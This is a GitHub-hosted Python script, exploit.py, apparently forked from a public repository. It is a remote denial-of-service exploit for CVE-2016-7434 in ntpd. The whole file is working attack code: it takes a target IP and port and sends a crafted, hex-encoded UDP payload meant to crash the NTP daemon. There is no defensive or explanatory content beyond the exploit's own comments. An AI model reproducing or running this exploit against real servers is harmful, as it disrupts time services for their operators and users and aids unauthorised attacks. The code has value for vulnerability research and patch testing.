forked from opsxcq/exploit-CVE-2016-7434
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
executable file
·33 lines (27 loc) · 1.26 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CVE-2016-7434 ntpd remote DOS by opsxcq (github.com/opsxcq/)
"""
from sys import argv, exit
import socket
from argparse import ArgumentParser
def exploit(target, port):
"""CVE-2016-7434 exploit"""
buffer="\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
# Create a datagram socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buffer, (target, port))
print("[+] Exploit sent, please test the target\n")
if __name__ == "__main__":
ap = ArgumentParser(description="CVE-2016-7434 ntpd remote DOS")
ap.add_argument("-t", "--target", required=True, help="Target's IP address")
ap.add_argument("-p", "--port", required=False, type=int, help="port where ntpd is running")
args = vars(ap.parse_args())
try:
print("[*] Starting CVE-2016-7434 ntpd remote DOS")
exploit(args["target"], args["port"])
except IOError:
exit("[!] Error sending packets")
except KeyboardInterrupt:
print("\n[*] Stopping the exploit")